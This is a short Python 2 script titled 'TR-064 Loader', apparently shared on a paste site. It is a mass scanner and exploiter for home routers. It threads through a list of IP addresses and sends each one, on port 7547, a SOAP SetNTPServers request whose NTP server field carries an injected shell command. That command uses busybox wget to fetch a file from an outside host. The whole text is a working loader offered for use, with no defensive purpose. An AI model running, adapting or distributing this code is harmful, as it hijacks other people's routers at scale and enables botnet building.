[ PYTHON ] TR-064 Loader (upnp)

1. #Backdoor removed
2. import sys, os, re
3. from threading import Thread
4. from time import sleep
5. import requests
6. from requests.auth import HTTPDigestAuth
7. from decimal import *
8.  
9. ips = open(sys.argv[1], "r").readlines()
10. motherthreads = int(sys.argv[2]) #2-1000
11. motherthread_count = len(ips) / motherthreads
12. motherthread_chunks = [ips[x:x+motherthread_count] for x in xrange(0, len(ips), motherthread_count)]
13. payload = "<?xml version=\"1.0\"?><SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"> <SOAP-ENV:Body>  <u:SetNTPServers xmlns:u=\"urn:dslforum-org:service:Time:1&qu ot;>   <NewNTPServer1>`cd /tmp && /bin/busybox wget http://iplogger.co/2qWq45`</NewNTPServer1>   <NewNTPServer2></NewNTPServer2>   <NewNTPServer3></NewNTPServer3>   <NewNTPServer4></NewNT PServer4>   <NewNTPServer5></NewNTPServer5>  </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope>"
14. headerlist = {'SOAPAction': 'urn:dslforum-org:service:Time:1#SetNTPServers'}
15.  
16. def dump(count):
17.     count = int(count)
18.     for i in motherthread_chunks[count]:
19.         try:
20.             url = "http://"+i+":7547/UD/act?1"
21.             url = re.sub('\n', '', url)
22.             r = requests.post(url, timeout=5, headers=headerlist, data=payload)
23.             print "[TR-064] Payload Sent %s"%(url)
24.             motherthread_chunks[count] = motherthread_chunks[count].remove(i)
25.         except:
26.             pass
27.  
28. for x in xrange(motherthreads):
29.     try:
30.         thread = Thread(target=dump, args=(x,))
31.         thread.start()
32.     except KeyboardInterrupt:
33.         sys.exit("STOPPING!")
34.     except:
35.         pass